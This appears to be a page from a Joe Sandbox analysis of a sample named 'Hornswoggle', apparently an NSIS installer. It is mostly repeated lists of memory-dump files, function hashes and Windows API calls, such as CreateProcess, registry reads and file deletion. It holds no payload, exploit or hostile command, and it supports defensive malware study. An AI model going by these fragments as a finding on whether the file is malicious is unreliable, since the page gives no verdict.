Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd2b84360dd7c3bf672bcc78a832e40c60aaabd2d33ded0d5d318971a638696
Instruction ID: 4069c4fc72520be48e16bfd385b53c7c255c7f0e47fd3261c7dbfe51bff91a5a
Opcode Fuzzy Hash: 8cd2b84360dd7c3bf672bcc78a832e40c60aaabd2d33ded0d5d318971a638696
Instruction Fuzzy Hash: 0B913470E04228CBEF28CF99C8547ADBBB1FF44305F15816AD856BB291C378A996CF44

Function 004067FA Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41c8aa7f72f1f93a2cbcdf9f632d1ef5542b7afda86631119225c1b51720529c
Instruction ID: e16a5cd5122dbeef30614bcf2b0def54f3f28e6aa070a3c0d2e235184150711d
Opcode Fuzzy Hash: 41c8aa7f72f1f93a2cbcdf9f632d1ef5542b7afda86631119225c1b51720529c
Instruction Fuzzy Hash: B1814771E04228CBDF24CFA9C8447ADBBB1FF44305F25816AD856BB281C7789996CF54

Function 004062FF Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 344cb5358226c0404198c7d180aef45b95627368966a6db8480b9102282d8a8c
Instruction ID: 250af7da94f29308333f8738aaa2927d74ee5fc9a8e658dcecc26e0f3faccd11
Opcode Fuzzy Hash: 344cb5358226c0404198c7d180aef45b95627368966a6db8480b9102282d8a8c
Instruction Fuzzy Hash: A7816631E04228DBDF24CFA9C8447AEBBB1FF44305F11816AD856BB281C7785A96CF54

Function 0040674D Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fcb4a8d7ef675eb47b5d59acfe40d72c7d0968365e25b36553ac1c3905db65f
Instruction ID: d3a2940f28ad1956632bfd73bee9eff7b9b7c3d901c1c2bf8e917ae235022c86
Opcode Fuzzy Hash: 2fcb4a8d7ef675eb47b5d59acfe40d72c7d0968365e25b36553ac1c3905db65f
Instruction Fuzzy Hash: 2D713471E00228DBDF24CFA9C8547ADBBB1FF44305F15806AD816BB281C778AA96DF54

Function 0040686B Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da2f706e7974a2021bad9ffdb380539c5442a57272a58128905f842303d595e8
Instruction ID: aa5f261e6b50ba4db5ffebf04d3efdb0ff665d1262494a5322ec58a673e68ddc
Opcode Fuzzy Hash: da2f706e7974a2021bad9ffdb380539c5442a57272a58128905f842303d595e8
Instruction Fuzzy Hash: 91715671E00228DBDF28CF99C854BADBBB1FF44305F15806AD816BB281C778A992DF54

Function 004067B7 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feb90363471a84b63e8ff2d487282df12a040b782cd1455c92e9c1b62a64594c
Instruction ID: ff328c296e0f6909f1720754cbeef76fe0f6b635d5236ea2459b9db161edb35a
Opcode Fuzzy Hash: feb90363471a84b63e8ff2d487282df12a040b782cd1455c92e9c1b62a64594c
Instruction Fuzzy Hash: 9F715771E00228DBEF28CF99C8547ADBBB1FF44305F15806AD856BB281C778AA56DF44

Function 00403064 Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403078

Part of subcall function 004031E3: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EE1,?), ref: 004031F1

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00402F8E,00000004,00000000,00000000,?,?,00402F08,000000FF,00000000,00000000,00409130,?), ref: 004030AB
SetFilePointer.KERNELBASE(0039CC6B,00000000,00000000,004128D8,00004000,?,00000000,00402F8E,00000004,00000000,00000000,?,?,00402F08,000000FF,00000000), ref: 004031A6

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: a36c4bf57cb6e858ef063313d681270ada8638ec8a77c6c3e08efa629b838403
Instruction ID: 32da71d67e65fe5252f8ded7d9303c2dcf981c5e4867c3c67dada36b4a4d5a13
Opcode Fuzzy Hash: a36c4bf57cb6e858ef063313d681270ada8638ec8a77c6c3e08efa629b838403
Instruction Fuzzy Hash: DD31B2B29012109FDB10BF2AFE4086A3BECE748356715823BE400B62E0C739DD52DB5E

Function 004021D2 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406167: FindFirstFileA.KERNELBASE(75923410,00421580,C:\,00405A06,C:\,C:\,00000000,C:\,C:\,75923410,?,75922EE0,00405725,?,75923410,75922EE0), ref: 00406172
Part of subcall function 00406167: FindClose.KERNEL32(00000000), ref: 0040617E

lstrlenA.KERNEL32 ref: 00402212
lstrlenA.KERNEL32(00000000), ref: 0040221C
SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402244

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 61c72c3acbeab377fc67236d864babf069cda309619979ed43041b7e4bbdfd7d
Instruction ID: 708f0fc9269f5af075d905106071f31bae39c4f67462bfddc0a38c2d79fef8c9
Opcode Fuzzy Hash: 61c72c3acbeab377fc67236d864babf069cda309619979ed43041b7e4bbdfd7d
Instruction Fuzzy Hash: FE112171904318AADB10EFB58945A9EB7F8AF14318F10853BA505FB2D2D6BCC9448B59

Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000,00000000,00000000), ref: 004050D8
Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\), ref: 004050EA
Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138

Part of subcall function 004055F4: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 0040561D
Part of subcall function 004055F4: CloseHandle.KERNEL32(?), ref: 0040562A

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: a33023bfda2542b486336c0229f0f2454b563ffb6bd9b7eab009217adf710acc
Instruction ID: 8164f88ac99e46b686dec60b6f66323921365fc284b2c72d55c18730983d64c3
Opcode Fuzzy Hash: a33023bfda2542b486336c0229f0f2454b563ffb6bd9b7eab009217adf710acc
Instruction Fuzzy Hash: 97015731904114EBDF11AFA1C98899F7BB2EF00344F20817BF601B52E1C7789A419B9A

Function 00402482 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024C3
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx8391.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 47ab25418fb38c8c5b03f0ebc620af0af5168f3c50133958f6b2384b9cd533c1
Instruction ID: e09e8e067f2b8771eb66943483239aed03eb61d96520190a1401bf15a77a7747
Opcode Fuzzy Hash: 47ab25418fb38c8c5b03f0ebc620af0af5168f3c50133958f6b2384b9cd533c1
Instruction Fuzzy Hash: BAF0AD72A04200BFEB11AF659E88EBB7A6DEB80344B10443AF505A61C0D6B84A459A7A

Function 004056BD Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00405AB1: GetFileAttributesA.KERNELBASE(?,?,004056C9,?,?,00000000,004058AC,?,?,?,?), ref: 00405AB6
Part of subcall function 00405AB1: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405ACA

RemoveDirectoryA.KERNELBASE(?,?,?,00000000,004058AC), ref: 004056D8
DeleteFileA.KERNELBASE(?,?,?,00000000,004058AC), ref: 004056E0
SetFileAttributesA.KERNEL32(?,00000000), ref: 004056F8

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: ecb533084f054dec527d8ee4002c22eb7271b0964ed621fa894de998c2c2fbf7
Instruction ID: 7218464210d320bbb7aaa7b2b3498e6226de7d0fc9260b199a665c24177db626
Opcode Fuzzy Hash: ecb533084f054dec527d8ee4002c22eb7271b0964ed621fa894de998c2c2fbf7
Instruction Fuzzy Hash: 4FE0E53150EA9157C2105731990C75F6AD8DF86324F840E36F955B21D0D7B94C068EAE

Function 00402F5C Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,00402F08,000000FF,00000000,00000000,00409130,?), ref: 00402F81

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 318766a007564a5c8c6069328ff7bf9d8ddc724485930b67641b25b8ac31027b
Instruction ID: 983d4f283b3a49842741e08d62faa859851885946f81c7e75766fedec90a3088
Opcode Fuzzy Hash: 318766a007564a5c8c6069328ff7bf9d8ddc724485930b67641b25b8ac31027b
Instruction Fuzzy Hash: 32319F70202219EFDF20EF56DD44A9B7BACEB00755F20803AF904E61D0D279DE40DBA9

Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx8391.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 408be7f7af0432980abd1dac26f88ffd518e424ecbfe51417bc02b193546086b
Instruction ID: ea61b96732c3ecdd8e38099917432d45b641eb3d8d4d3075f09eb17731070f47
Opcode Fuzzy Hash: 408be7f7af0432980abd1dac26f88ffd518e424ecbfe51417bc02b193546086b
Instruction Fuzzy Hash: 7111A771905205FFDF14DF64C6889AEBBB4EF11349F20847FE141B62C0D2B84A45DB5A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: MessageSend
String ID:
